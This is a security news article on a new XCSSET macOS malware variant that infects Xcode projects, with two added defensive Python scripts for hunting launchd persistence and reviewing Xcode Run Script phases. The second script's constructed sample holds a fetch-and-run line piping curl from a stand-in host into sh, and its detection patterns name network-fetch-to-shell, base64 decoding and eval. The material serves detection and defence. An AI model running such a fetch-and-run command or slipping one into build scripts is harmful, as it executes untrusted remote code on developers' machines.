New XCSSET Malware Variant Targets macOS Xcode Developers

Microsoft Threat Intelligence specialists have identified a new variant of the XCSSET malware for macOS. This version introduces features for monitoring the system clipboard to intercept cryptocurrency transactions and employs new persistence methods to maintain a foothold on infected devices.

Background on XCSSET

XCSSET is modular malware designed for macOS with capabilities for stealing sensitive data and cryptocurrency. It targets:

  • Apple Notes
  • Cryptocurrency wallets
  • Browser-stored credentials and data

The malware propagates by infecting other Xcode projects on a victim’s device. Once a compromised project is shared and built, the malicious code executes automatically.

“XCSSET is designed to infect Xcode projects, which are commonly used by software developers, and executes during the build process,” Microsoft explains. “We believe this infection and distribution method relies on project files being shared among developers of Apple or macOS applications.”

What’s New in the Variant

Researchers highlight several new capabilities in the updated malware:

  • Browser data theft: Attempts to steal information from Firefox by deploying a modified version of HackBrowserData, an open-source tool that decrypts and exports browser data.
  • Clipboard hijacking: Monitors the macOS clipboard for cryptocurrency addresses (using regular expression patterns). When detected, the malware replaces the address with one belonging to the attacker, redirecting funds.
  • Persistence mechanisms: Maintains a foothold by creating LaunchDaemon entries that execute a payload from ~/.root, and disguises itself with a fake System Settings.app in /tmp.
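The two persistence indicators above (a launchd job that runs something out of ~/.root, and a decoy System Settings.app under /tmp) are concrete enough to hunt for. The script below is an added example written for this article, not Microsoft's detection logic: it parses launchd job plists, collects every string launchd would execute, and reports those matching either indicator. The indicator paths come from the article; the regexes that encode them, the directory list and the sample jobs are my own, and the samples are constructed, not real XCSSET artefacts.

```python
"""Triage launchd job plists for the persistence indicators the article names:
a job executing from ~/.root, or a decoy System Settings.app in /tmp.
Added example, not Microsoft's tooling. Assumptions: indicator paths are
taken from the article; the sample plists are constructed for the demo."""
import plistlib
import re
from pathlib import Path
from xml.parsers.expat import ExpatError

# Indicators taken from the article; the regexes are my rendering of them.
INDICATORS = [
    ("program under a hidden .root directory", re.compile(r"(^|/)\.root(/|$)")),
    ("decoy System Settings.app in /tmp", re.compile(r"^/tmp/System Settings\.app(/|$)")),
]

# Directories launchd loads jobs from. The article mentions LaunchDaemons;
# the LaunchAgents directories are included because they are the usual
# sibling locations worth checking in the same sweep (assumption, not from the page).
LAUNCHD_DIRS = [
    Path("/Library/LaunchDaemons"),
    Path("/Library/LaunchAgents"),
    Path.home() / "Library/LaunchAgents",
]


def program_paths(job: dict) -> list[str]:
    """Every string launchd could execute or pass on the command line."""
    paths = []
    if isinstance(job.get("Program"), str):
        paths.append(job["Program"])
    args = job.get("ProgramArguments")
    if isinstance(args, list):
        paths.extend(a for a in args if isinstance(a, str))
    return paths


def scan_job(job: dict) -> list[tuple[str, str]]:
    """Return (indicator label, matching string) pairs for one launchd job."""
    hits = []
    for value in program_paths(job):
        for label, pattern in INDICATORS:
            if pattern.search(value):
                hits.append((label, value))
    return hits


def scan_plist(data: bytes) -> list[tuple[str, str]]:
    """Parse raw plist bytes (XML or binary) and scan the job it describes."""
    try:
        job = plistlib.loads(data)
    except (plistlib.InvalidFileException, ValueError, ExpatError):
        return []  # not a parsable plist, so not a launchd job we can reason about
    return scan_job(job) if isinstance(job, dict) else []


def scan_launchd_dirs(dirs=LAUNCHD_DIRS) -> dict[str, list[tuple[str, str]]]:
    """Scan every .plist in the launchd directories; returns path -> hits."""
    findings = {}
    for d in dirs:
        if not d.is_dir():
            continue
        for p in d.glob("*.plist"):
            hits = scan_plist(p.read_bytes())
            if hits:
                findings[str(p)] = hits
    return findings


# Constructed samples: one job mimicking the ~/.root persistence, one the
# /tmp decoy, and one ordinary-looking job for contrast. None is a real artefact.
def _job(label: str, args: list[str]) -> bytes:
    return plistlib.dumps({"Label": label, "ProgramArguments": args, "RunAtLoad": True})


SAMPLE_ROOT_JOB = _job("com.example.constructed.root", ["/bin/sh", "-c", "~/.root/payload"])
SAMPLE_DECOY_JOB = _job(
    "com.example.constructed.decoy",
    ["/tmp/System Settings.app/Contents/MacOS/System Settings"],
)
SAMPLE_BENIGN_JOB = _job("com.example.constructed.benign", ["/usr/libexec/example-helper", "--daemon"])


if __name__ == "__main__":
    for name, data in [("root", SAMPLE_ROOT_JOB), ("decoy", SAMPLE_DECOY_JOB), ("benign", SAMPLE_BENIGN_JOB)]:
        print(f"sample {name}: {scan_plist(data)}")
    for path, hits in scan_launchd_dirs().items():
        print(path, hits)
```

Run it as-is to see the three constructed samples classified, then on a live Mac the last loop walks the real launchd directories. Matching on `Program` and `ProgramArguments` rather than on the `Label` matters because a job's label is free text and trivially renamed, whereas the path it executes is the thing that has to point at the payload.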

Current Scope of Attacks

According to Microsoft, the new variant has not yet reached widespread distribution, though it has already been observed in limited attacks.

Researchers have reported their findings to Apple and are collaborating with GitHub to take down repositories associated with XCSSET.

Defensive Recommendations

Security specialists recommend:

  • Keeping macOS and applications fully updated (given XCSSET’s history of exploiting zero-day vulnerabilities).
  • Verifying Xcode projects before building them, especially when projects are obtained from external sources.
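Since the article states the malware runs during the build, "verifying Xcode projects before building" in practice means reading what the project will execute at build time. The script below is an added example written for this article, not Microsoft's or Apple's tooling: it pulls every Run Script build phase (`PBXShellScriptBuildPhase`) out of a `project.pbxproj` so the scripts can be reviewed, and applies a few generic review heuristics. The heuristics are assumptions about what a build script rarely needs to do, not XCSSET signatures, and the sample project text is constructed for the demo.

```python
"""List Run Script build phases in an Xcode project.pbxproj for review before
building. Added example, not Microsoft's or Apple's tooling. Assumptions:
the heuristics are generic (not XCSSET signatures); the sample is constructed."""
import re
import sys
from pathlib import Path

# Each top-level object in a pbxproj reads "<24-hex id> /* name */ = { ... };".
OBJECT_RE = re.compile(
    r"(?P<id>[0-9A-F]{24})\s*(?:/\*\s*(?P<name>[^*]*?)\s*\*/)?\s*=\s*\{(?P<body>.*?)\n[ \t]*\};",
    re.S,
)
# The script body is a double-quoted string with backslash escapes.
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";', re.S)

# Generic review heuristics (assumed, not from the article): behaviour a build
# script rarely needs, each worth a human look before the project is built.
HEURISTICS = [
    ("network fetch piped to a shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("base64-decoded content", re.compile(r"base64\s+(-d|--decode|-D)\b")),
    ("eval of dynamic content", re.compile(r"\beval\b")),
    ("writes into launchd directories", re.compile(r"Launch(Agents|Daemons)")),
]


def unescape(s: str) -> str:
    """Undo pbxproj string escapes: \\n, \\t, \\" and \\\\."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def find_run_script_phases(pbxproj_text: str) -> list[dict]:
    """Return one dict per PBXShellScriptBuildPhase: id, name, script, flags."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj_text):
        body = m.group("body")
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        sm = SCRIPT_RE.search(body)
        script = unescape(sm.group(1)) if sm else ""
        flags = [label for label, pat in HEURISTICS if pat.search(script)]
        phases.append({"id": m.group("id"), "name": m.group("name") or "", "script": script, "flags": flags})
    return phases


def report(pbxproj_path: Path) -> list[dict]:
    """Print every run-script phase in a project file, flagged ones first."""
    phases = find_run_script_phases(pbxproj_path.read_text(errors="replace"))
    for p in sorted(phases, key=lambda p: not p["flags"]):
        marker = "REVIEW" if p["flags"] else "ok"
        print(f"[{marker}] {p['id']} {p['name']!r} {p['flags']}")
        print("    " + p["script"].rstrip().replace("\n", "\n    "))
    return phases


# Constructed sample: a harmless lint phase, a non-script phase that must be
# ignored, and a phase whose script should be looked at before building.
SAMPLE_PBXPROJ = (
    "// !$*UTF8*$!\n{\n\tobjects = {\n"
    "\t\tAAAAAAAAAAAAAAAAAAAAAAAA /* Run SwiftLint */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    "\t\t\tshellPath = /bin/sh;\n"
    "\t\t\tshellScript = \"if which swiftlint >/dev/null; then swiftlint; fi\\n\";\n"
    "\t\t};\n"
    "\t\tBBBBBBBBBBBBBBBBBBBBBBBB /* Sources */ = {\n"
    "\t\t\tisa = PBXSourcesBuildPhase;\n"
    "\t\t\tfiles = (\n\t\t\t);\n"
    "\t\t};\n"
    "\t\tCCCCCCCCCCCCCCCCCCCCCCCC /* ShellScript */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    "\t\t\tshellPath = /bin/sh;\n"
    "\t\t\tshellScript = \"curl -s http://example.invalid/stage | sh\\n\";\n"
    "\t\t};\n"
    "\t};\n}\n"
)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        report(Path(sys.argv[1]))  # e.g. MyApp.xcodeproj/project.pbxproj
    else:
        for p in find_run_script_phases(SAMPLE_PBXPROJ):
            print(p["id"], p["name"], p["flags"])
```

Point it at a `project.pbxproj` received from outside and read every phase it prints, not only the flagged ones; the heuristics are a prompt for attention, not a verdict, and an unflagged script can still be one you would not want to run. For a fuller parse than this regex, Apple's `plutil` can convert the OpenStep-format pbxproj to XML or JSON, which can then be walked with `plistlib`.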